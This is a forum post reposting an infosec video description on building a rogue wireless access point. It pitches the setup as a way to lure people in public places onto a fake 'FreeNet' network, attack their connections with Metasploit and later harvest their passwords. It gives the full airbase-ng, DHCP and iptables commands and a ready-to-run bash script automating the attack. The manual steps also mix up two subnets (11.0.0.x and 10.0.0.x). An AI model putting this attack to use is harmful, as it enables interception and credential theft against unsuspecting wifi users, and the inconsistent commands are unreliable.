Jump to content
Nytro

Create Wireless Rogue Access Point

Recommended Posts

Posted

Create Wireless Rogue Access Point

Description: In this video I will show you how to create a fake Access point.

What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords.

Steps : -

apt-get install dhcp3-server

airmon-ng start wlan0

airbase-ng -e FreeNet -c 11 -v wlan0

ifconfig at0 up

ifconfig at0 11.0.0.254 netmask 255.255.255.0

route add -net 11.0.0.0 netmask 255.255.255.0

gw 11.0.0.254

---- Add Config in dhcp3 ----

Path = /etc/dhcp3/dhcpd.conf

---- Paste it this -----

ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

authoritative;

subnet 10.0.0.0 netmask 255.255.255.0 {

option subnet-mask 255.255.255.0;

option broadcast-address 10.0.0.255;

option routers 10.0.0.254;

option domain-name-servers 8.8.8.8;

range 10.0.0.1 10.0.0.140;

}

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables -P FORWARD ACCEPT

iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE

echo > '/var/lib/dhcp3/dhcpd.leases'

ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0

echo "1" > /proc/sys/net/ipv4/ip_forward

If you feel boring to type all these commands no problem ? Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error.

Source : - exploit.co.il

#!/bin/bash

echo "Killing Airbase-ng..."

pkill airbase-ng

sleep 2;

echo "Killing DHCP..."

pkill dhcpd3

sleep 5;

echo "Putting Wlan In Monitor Mode..."

airmon-ng stop wlan0 # Change to your wlan interface

sleep 5;

airmon-ng start wlan0 # Change to your wlan interface

sleep 5;

echo "Starting Fake AP..."

airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface

sleep 5;

ifconfig at0 up

ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.conf

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

sleep 5;

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables -P FORWARD ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface

echo > '/var/lib/dhcp3/dhcpd.leases'

ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

sleep 5;

echo "1" > /proc/sys/net/ipv4/ip_forward

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Sursa: Create Wireless Rogue Access Point

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...